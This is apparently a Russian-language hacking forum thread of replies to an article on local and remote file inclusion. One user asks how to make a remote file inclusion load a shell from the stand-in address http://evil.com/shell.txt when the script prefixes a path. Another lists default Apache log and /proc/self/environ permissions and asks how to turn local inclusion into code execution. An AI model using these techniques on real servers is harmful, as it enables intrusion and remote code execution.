Авторские статьи Вся правда о (Local|Remote) File Inclusion

Discussion in 'Статьи' started by Expl0ited, 30 Sep 2010.

  1. sanchez

    sanchez New Member

    Joined:
    23 May 2011
    Messages:
    4
    Likes Received:
    2
    Reputations:
    -1
    Доступно и хорошо
     
  2. CYBERzzRASTA

    CYBERzzRASTA New Member

    Joined:
    11 Mar 2013
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    извиняюсь если кто уже спрашивал
    есть допустим rfi у меня, но в переменную куда я вбиваю адрес шелла добавляется в начало к примеру modules и поучается скрипт обрашается не к http://evil.com/shell.txt а непосредственно к modules/http://evil.com/shell.txt и весь rfi идет коту под хвост
    как бороться с этим?
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    здесь получится только LFI. для вопросов по уязвимостям есть отдельная тема
     
    _________________________
  4. LOCb

    LOCb New Member

    Joined:
    29 May 2012
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Господа, а с этим что делать предложите?
    total 68
    -rw-r----- 1 root adm 25391 июля 21 13:42 access.log
    -rw-r----- 1 root adm 32189 июля 21 13:42 error.log
    -rw-r----- 1 root adm 0 июля 20 20:40 other_vhosts_access.log
    lao@lao-S:/var/log/apache2$
    lao@lao-S:/proc/self$ ls -l | grep environ
    -r-------- 1 lao lao 0 июля 21 13:42 environ
    lao@lao-S:/var/www$ ls -l
    total 4
    drwxr-xr-x 2 root root 4096 июля 20 21:02 html
    И это не какие-то хитрые настройки крутого админа, это по дефолту. если дать всем права хотя бы на чтение логов, то всё относительно не плохо. А так большая саSAMBA получается. Есть идеи?
     
    #24 LOCb, 21 Jul 2015
    Last edited: 21 Jul 2015